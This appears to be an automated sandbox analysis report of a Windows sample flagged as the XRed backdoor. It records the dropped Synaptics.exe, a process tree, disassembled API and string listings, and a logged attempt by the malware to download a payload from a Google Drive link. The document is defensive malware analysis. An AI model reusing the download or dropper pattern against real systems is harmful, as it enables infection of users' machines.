Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:12 UTC	375	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
2024-07-25 20:06:12 UTC	1246	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 25 Jul 2024 20:06:12 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-ChF911g6bM79_cyaQqi5Aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1642 X-GUploader-UploadID: AHxI1nOczPStk0J1wmLYKrSbep6FpNrxeIvTxJ1tqKBPFczn9Iov_rn_oTD4_Ca5ws79mWAbG7Q Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-07-25 20:06:12 UTC	144	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: <html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found
2024-07-25 20:06:12 UTC	1390	IN	Data Raw: 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 33 38 33 35 41 6b 61 71 5f 55 4f 6e 76 56 48 55 42 61 4f 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 Data Ascii: )!!1</title><style nonce="t3835Akaq_UOnvVHUBaOyw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0
2024-07-25 20:06:12 UTC	108	IN	Data Raw: 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: s an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Target ID:	0
Start time:	16:04:54
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_282.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_282.exe"
Imagebase:	0x400000
File size:	16'016'392 bytes
MD5 hash:	6D1FD0AF6DD71B3CA81ECEFB1D9F9324
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:04:55
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe"
Imagebase:	0xc90000
File size:	15'244'952 bytes
MD5 hash:	1BD671CE0DEAAA901841AE87D92B3606
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	16:04:56
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe" -burn.unelevated BurnPipe.{D1F32E49-3F7D-4852-BF07-482476425E70} {3ABCDB34-CFB2-4087-949E-3896BDF3C63B} 6884
Imagebase:	0xc90000
File size:	15'244'952 bytes
MD5 hash:	1BD671CE0DEAAA901841AE87D92B3606
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	16:04:57
Start date:	25/07/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	B753207B14C635F29B2ABF64F603570A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	16:04:59
Start date:	25/07/2024
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x4b0000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	16:05:07
Start date:	25/07/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe"
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	B753207B14C635F29B2ABF64F603570A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:07:01
Start date:	25/07/2024
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff6368b0000
File size:	163'840 bytes
MD5 hash:	77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00CC3185 Relevance: 49.4, APIs: 27, Strings: 1, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00CC31C5
_memset.LIBCMT ref: 00CC31E8
_memset.LIBCMT ref: 00CC3202
_memset.LIBCMT ref: 00CC321C
_memset.LIBCMT ref: 00CC3236
_memset.LIBCMT ref: 00CC3250
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00CC3267
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC3271
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00CC32B8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC32BE
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00CC32FF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC3305
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00CC3346
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC334C
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 00CC338D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC3393
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 00CC33D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC33DA
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00CC34CC
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00CC3507
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC3511
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00CC3547
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC3551
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CC3588
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC3592
CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00CC35D8
LocalFree.KERNEL32(?), ref: 00CC35EE

Strings

srputil.cpp, xrefs: 00CC35B7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$_memset$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
String ID: srputil.cpp
API String ID: 3642641498-4105181634
Opcode ID: d984c1ad3f42b219c6d0dba10ac0d9ce5ff0effb0f390f7744f99861b0e394c0
Instruction ID: b79ceda5434d1c45d368249ebd24033642778cad5d6e9d033461605046d16ea8
Opcode Fuzzy Hash: d984c1ad3f42b219c6d0dba10ac0d9ce5ff0effb0f390f7744f99861b0e394c0
Instruction Fuzzy Hash: 23D14FB2D40269AEDB209F95DC85FEEBAB8BB08310F1445AEE519F6140D7748F848F91

Function 00C91B46 Relevance: 42.3, APIs: 7, Strings: 17, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00C91BA5
_memset.LIBCMT ref: 00C91BC9

Part of subcall function 00C91033: InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 00C91057
Part of subcall function 00C91033: InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 00C91060
Part of subcall function 00C91033: GetCurrentProcess.KERNEL32(00000000,?,?,?,0000011C), ref: 00C9107E

CoInitializeEx.OLE32(00000000,00000000,00000003,00000000), ref: 00C91C04
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C91F08

Part of subcall function 00C91226: CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00C912AC

Part of subcall function 00C9157C: ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C9174B
Part of subcall function 00C9157C: CloseHandle.KERNEL32(00000000,?,?,?,00C91DEA,?,?), ref: 00C91754

Part of subcall function 00C918B9: IsWindow.USER32(?), ref: 00C91AC3
Part of subcall function 00C918B9: PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C91AD6
Part of subcall function 00C918B9: CloseHandle.KERNEL32(00000000,?,?,?,00C91E12,?), ref: 00C91AE5

Strings

_Failed, xrefs: 00C91E63
Failed to initialize engine state., xrefs: 00C91BE2
Invalid run mode., xrefs: 00C91D82
Failed to get OS info., xrefs: 00C91CD6
3.7.3813.0, xrefs: 00C91D1C
engine.cpp, xrefs: 00C91CCC
Failed to run per-user mode., xrefs: 00C91E18
Setup, xrefs: 00C91E68
txt, xrefs: 00C91E5E
Failed to initialize Regutil., xrefs: 00C91C41
Failed to initialize Wiutil., xrefs: 00C91C60
Failed to initialize COM., xrefs: 00C91C10
Failed to initialize core., xrefs: 00C91D5C
Failed to run embedded mode., xrefs: 00C91DD1
Failed to initialize XML util., xrefs: 00C91C7F
Failed to run RunOnce mode., xrefs: 00C91DA9
Failed to run per-machine mode., xrefs: 00C91DF0

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandleInitialize$CriticalSection_memset$CurrentMessageMutexPostProcessReleaseUninitializeWindow
String ID: 3.7.3813.0$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Invalid run mode.$Setup$_Failed$engine.cpp$txt
API String ID: 3466682788-3889865336
Opcode ID: 061d3cfd7179141699c5cb76f6e04ce53fb0a35816065e61c4861cb7c829f43f
Instruction ID: 0a076b03af9f5fb907c0baf222971f121979b3c9056ced8a9d5712ee9966f643
Opcode Fuzzy Hash: 061d3cfd7179141699c5cb76f6e04ce53fb0a35816065e61c4861cb7c829f43f
Instruction Fuzzy Hash: 86B1847294015A9BCF21AFA5CC8BFEDB6B9AB48304F5800EAF909A7141DB314F91DF51

Function 00CC573B Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 151
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,?,00CC5923,00000000,?,00000000), ref: 00CC5759
GetLastError.KERNEL32(?,?,00CC5923,00000000,?,00000000,?,?,?,?,?,?,?,?,00CB3EA0,00C9222A), ref: 00CC5765
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00CC57C9
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CC57D5
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00CC57DF
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CC57EA
CoCreateInstance.OLE32(00CE7EF8,00000000,00000001,00CCBCE0,?,?,?,00CC5923,00000000,?,00000000), ref: 00CC5824
ExitProcess.KERNEL32 ref: 00CC58D9

Strings

xmlutil.cpp, xrefs: 00CC578F
Wow64RevertWow64FsRedirection, xrefs: 00CC57E1
kernel32.dll, xrefs: 00CC5745
Wow64DisableWow64FsRedirection, xrefs: 00CC57CF
IsWow64Process, xrefs: 00CC57C3
Wow64EnableWow64FsRedirection, xrefs: 00CC57D7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 5fff98cbb8d0b2aad37ae630e49d65dbc73221cd58561b644204845316ec1e11
Instruction ID: 711d5e68bd4a389500a840bf2ef7f1f82356a43f63bf03ca3c60b5f3fd7ca187
Opcode Fuzzy Hash: 5fff98cbb8d0b2aad37ae630e49d65dbc73221cd58561b644204845316ec1e11
Instruction Fuzzy Hash: F6515D71E5061AEBDB108FA5CC45FAEBBB8AF04715F104569E520E7280DBB5DA80CB90

Function 00CC2955 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 7837ee07fb3cfbc8579a4b1e90bb4bcf313226d08aeb6f6f8493c367c2f9e7b0
Instruction ID: 20dbde83e06f94f76e7c6144c1c6785fab8504f19a494e6fa7a4efc050b6114d
Opcode Fuzzy Hash: 7837ee07fb3cfbc8579a4b1e90bb4bcf313226d08aeb6f6f8493c367c2f9e7b0
Instruction Fuzzy Hash: B8C00272594209A78F005FF4DC0AE9D779CA754613B048511F515C7150D739E5549B61

Function 00C9621F Relevance: 115.9, APIs: 3, Strings: 63, Instructions: 444
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @ProductFamily., xrefs: 00C9670D
Failed to get @Publisher., xrefs: 00C96436
Failed to get @HelpTelephone., xrefs: 00C96480
Update, xrefs: 00C96676
Failed to select registration node., xrefs: 00C96259
Tag, xrefs: 00C9628B
Failed to get @ParentDisplayName., xrefs: 00C964EF
Department, xrefs: 00C966D1
Name, xrefs: 00C9671B
Failed to get @DisableRemove., xrefs: 00C96638
HelpLink, xrefs: 00C96444
Failed to get @DisplayVersion., xrefs: 00C96411
Failed to get @Register., xrefs: 00C963C7
Failed to parse related bundles, xrefs: 00C962B6
Failed to get @Department., xrefs: 00C966E8
button, xrefs: 00C96566
Invalid modify disabled type: %ls, xrefs: 00C965ED
ProviderKey, xrefs: 00C96306
ExecutableName, xrefs: 00C96327
HelpTelephone, xrefs: 00C96469
Register, xrefs: 00C963B4
Failed to parse software tag., xrefs: 00C96668
Failed to parse @Version: %ls, xrefs: 00C962F8
Failed to select ARP node., xrefs: 00C963A6
PerMachine, xrefs: 00C96345
Registration, xrefs: 00C9622E
Publisher, xrefs: 00C9641F
registration.cpp, xrefs: 00C965E0
DisableModify, xrefs: 00C9654D
Compressed, xrefs: 00C96369
Comments, xrefs: 00C96500
Failed to get @ProviderKey., xrefs: 00C96319
Version, xrefs: 00C962C4
Failed to get @HelpLink., xrefs: 00C9645B
Arp, xrefs: 00C9638A
Failed to get @Name., xrefs: 00C9672E
Failed to get @Compressed., xrefs: 00C9637C
Failed to get @PerMachine., xrefs: 00C96358
Failed to get @Tag., xrefs: 00C9629E
Manufacturer, xrefs: 00C966A3
ParentDisplayName, xrefs: 00C964D8
DisplayName, xrefs: 00C963D5
Failed to get @Contact., xrefs: 00C9653F
Failed to get @ExecutableName., xrefs: 00C9633A
DisplayVersion, xrefs: 00C963FA
ProductFamily, xrefs: 00C966F6
Failed to get @Version., xrefs: 00C962D7
yes, xrefs: 00C9658C
AboutUrl, xrefs: 00C9648E
Failed to select Update node., xrefs: 00C96692
DisableRemove, xrefs: 00C96621
UpdateUrl, xrefs: 00C964B3
Failed to get @AboutUrl., xrefs: 00C964A5
Failed to get @Manufacturer., xrefs: 00C966C0
Failed to get @Classification., xrefs: 00C9674F
Classification, xrefs: 00C9673C
Failed to set registration paths., xrefs: 00C96763
Failed to get @DisableModify., xrefs: 00C96610
Failed to get @DisplayName., xrefs: 00C963EC
Contact, xrefs: 00C96528
Failed to get @Id., xrefs: 00C9627D
Failed to get @UpdateUrl., xrefs: 00C964CA
Failed to get @Comments., xrefs: 00C96517

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Compressed$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Compressed.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-3565783206
Opcode ID: c202d922d66f4bf3f361a2f694098e27850452fa869f04992ee09f5804c20b55
Instruction ID: 132a2aa27f6e01d58d6c5d16d4119818b9557b19a958b7ca93960155601bd16c
Opcode Fuzzy Hash: c202d922d66f4bf3f361a2f694098e27850452fa869f04992ee09f5804c20b55
Instruction Fuzzy Hash: 9FE12632680605BFCF12DAA1CD4AF7E76B6AB91754F21043DF426A32D0DF71E981A711

Function 00C944A6 Relevance: 103.8, APIs: 8, Strings: 51, Instructions: 592
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00C945C7
SysFreeString.OLEAUT32(00000000), ref: 00C94C42

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

Strings

package.cpp, xrefs: 00C9452D, 00C94655, 00C949D4, 00C94ADC
Failed to get @Permanent., xrefs: 00C94A2E
ExePackage, xrefs: 00C94864
InstallSize, xrefs: 00C9470A
RollbackBoundary, xrefs: 00C944B4
MsiPackage, xrefs: 00C948A2
Failed to get @LogPathVariable., xrefs: 00C94A42
Failed to get @Cache., xrefs: 00C949FC
Permanent, xrefs: 00C94740
Failed to parse dependency providers., xrefs: 00C94AB2
Failed to allocate memory for MSP patch sequence information., xrefs: 00C949DE
Failed to get @CacheId., xrefs: 00C94A06
MsuPackage, xrefs: 00C94911
Failed to parse MSU package., xrefs: 00C94A9E
LogPathVariable, xrefs: 00C94781
InstallCondition, xrefs: 00C947C7
Failed to parse payload references., xrefs: 00C94AA8
Failed to get @RollbackLogPathVariable., xrefs: 00C94A4C
Failed to get rollback bundary node count., xrefs: 00C944F3
Failed to get @InstallCondition., xrefs: 00C94A56
RollbackBoundaryForward, xrefs: 00C947EA
Cache, xrefs: 00C946B9
CacheId, xrefs: 00C946D4
Failed to select package nodes., xrefs: 00C94606
Failed to select rollback boundary nodes., xrefs: 00C944D9
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 00C945F3
Failed to allocate memory for rollback boundary structs., xrefs: 00C94537
Failed to parse EXE package., xrefs: 00C94896
Failed to get @RollbackBoundaryBackward., xrefs: 00C94A74
Failed to get package node count., xrefs: 00C94623
Failed to parse target product codes., xrefs: 00C94C0D
PerMachine, xrefs: 00C94725
Failed to get next node., xrefs: 00C949E8
Failed to get @RollbackBoundaryForward., xrefs: 00C94A60
Failed to get @Vital., xrefs: 00C94A38
Failed to find forward transaction boundary: %ls, xrefs: 00C94A6D
Failed to allocate memory for patch sequence information to package lookup., xrefs: 00C94AE6
RollbackLogPathVariable, xrefs: 00C947A4
Size, xrefs: 00C946EF
MspPackage, xrefs: 00C948D8
Failed to allocate memory for package structs., xrefs: 00C9465F
`<u, xrefs: 00C945C7, 00C94987, 00C94C42
Failed to find backward transaction boundary: %ls, xrefs: 00C94A81
Failed to get @PerMachine., xrefs: 00C94A24
Failed to parse MSI package., xrefs: 00C948CC
RollbackBoundaryBackward, xrefs: 00C94825
Failed to get @InstallSize., xrefs: 00C94A1A
Failed to parse MSP package., xrefs: 00C94A94
Vital, xrefs: 00C94598, 00C94766
Failed to get @Size., xrefs: 00C94A10
Failed to get @Id., xrefs: 00C949F2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

